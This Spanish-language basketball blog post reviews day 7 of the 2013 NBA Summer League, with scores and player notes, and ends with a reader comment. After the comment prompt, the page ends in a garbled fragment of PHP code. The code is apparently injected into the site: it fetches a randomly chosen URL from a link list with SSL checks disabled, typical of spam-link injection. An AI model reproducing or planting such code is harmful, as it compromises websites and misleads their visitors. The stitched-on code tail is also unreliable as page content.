Summer Leagues: Día 7

14 de July de 2013 por rumbero

gsw wizSegunda día de Summer League en Las Vegas. Se inauguraba la jornada con un Warriors-Wizards que fue un auténtico festival de desacierto. Se lo llevaron los de Oakland 56-52 por ser menos malos. Seguidamente los Mavs ganaban a los Kings 76-73 con un McLemore muy protagonista. Los Wolves perdían contra un combinado de la D-League 81-83 mientras la Bulls daban cuenta de los Grizzlies 81-67. Finalmente Phoenix se imponía a Portland 82-69, Denver sucumbía ante unos buenos Bucks 74-88 y los amigos de los campeones perdían contra Toronto 72-81.

DESTACADOS

Kent Bazemore

Que el de los Warriors es un excelente defensor lo sabíamos y lo volvió a demostrar, pero además ayer tuvo un gran día en el apartado ofensivo para acabar con 21 puntos, 5 rebotes y 4 asistencias y ser el líder de su equipo. Sólo le falta mejorar en el tiro de larga distancia (1/6 3P)

Josh Akognon & Jae Crowder

Los mejores por parte de Dallas. El base acabó con 22 puntos (8/14 FG) mientras que el alero cuajó un partido muy completo con 16 puntos y 8 rebotes. Temporada de confirmación para este último.

morris brosMorris Brothers

Si hace poco nombrábamos a los Plumlee hoy hay que destacar la labor de estos dos. 14/5 para Marcus y 18/5 para Markieff en apenas 20 minutos. Los mejores de Phoenix.

CJ McCollum

Ojito. Vamos a darle margen al chaval porque si nos tenemos que fiar de su primer partido cuidado con la parejita que puede formar con Lillard. 22 puntos, 3 rebotes, 4 asistencias, 1 robo y 4 pérdidas. Excelente debut, incluso le pusieron encima a Tucker un rato para ver si le podía frenar de lo suelto que andaba.

John Henson

Este chaval es un buen bicho en la pintura. 19 puntos, 13 rebotes y 3 tapones en apenas 20 minutos. Más minutos para él con los grandes.

Andrew Goudelock

No hay nada como buscarse un buen contratito. Tuvo el día con 26 puntos, 4 rebotes, 2 asistencias, 2 robos y 2 pérdidas para ser la referencia de los Bulls. ¿Young, Johnson, Meeks? El bueno es Andrew y lo sabemos todos.

Jonas Valanciunas

23 puntos y 7 rebotes para el lituano. Dominando claramente la pintura y eso que no estaba Bargnani. Luego vendrá Gay a quitarle tiros, pero ha empezado a gran nivel. Que lo disfrute.

A SEGUIR

Otto Porter

No tuvo el mejor debut el ex de Georgetown, pero hay que tener en cuenta que tuvo que vérselas durante mucho tiempo con Bazemore que es un auténtico hueso en defensa. Acabó el partido con 7 puntos (3/11 FG), 6 rebotes, 1 robo y 2 pérdidas.

Ray McCallum

Casi todas las miradas estaban puestas en McLemore pero el rookie hizo un partido bastante más sólido que el de su compañero. Desacertado en el tiro acabó con 11 puntos, 8 rebotes, 4 asistencias, 3 robos y 2 pérdidas.

Gal Mekel & Ricky Ledo

Buen partido de ambos. El israelí acabó con 14 puntos, 4 rebotes, 4 asistencias y 3 pérdidas. Con la duda de Devin Harris y la lesión de Larkin podría tener más minutos de los esperados. Ledo sacó algo de su talento ofensivo y terminó con 9 puntos(4/5 FG) y 3 rebotes en 22 minutos

muhammadShabazz Muhammad

Discretitio el alero de los Wolves. 7 puntos, 1 rebote, 1 asistencia y 3 pérdidas en 25 minutos. No se volvió loco intentando tirar todo lo que le llegaba.

Archie Goodwin

No jugando Len había que estar atento a la participación de Goodwin. 13 puntos y 3 rebotes siendo su primer partido y con 18 años no está mal. Buen partido.

DECEPCIONES

Scott Machado

Tuvo un par de buenos detalles pero no se puede decir que su partido fuera bueno. 1/11 FG, 1 rebote, 2 asistencias, 1 robo y 3 pérdidas. Scott, en este blog hay muchas esperanzas puestas en ti, queremos bastante más.

Ben McLemore

De los creadores de “Trey Burke anda suelto” llega…”McLemore desencadenado”. 4/23 FG, 1/11 3P. Una mezcla entre agujero negro y escopeta de feria. La mayoría de triples fallados se le quedaron cortos, así que le daremos el beneficio de la duda por el cambio de distancia, pero cuando uno no tiene el día pues se corta un poco y no pasa nada….

Jordan Hamilton

Si el de Denver quiere ganarse más minutos de cara a la temporada debería afinar un poco más la puntería. 1/11 en tiros de campo adornados con 9 rebotes.

Comenta

Un comentario a esta entrada

  1. Txusma dice:
    #1

    Se rumorea que el título de blog puede cambiar a “Scott Machado Blog”

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>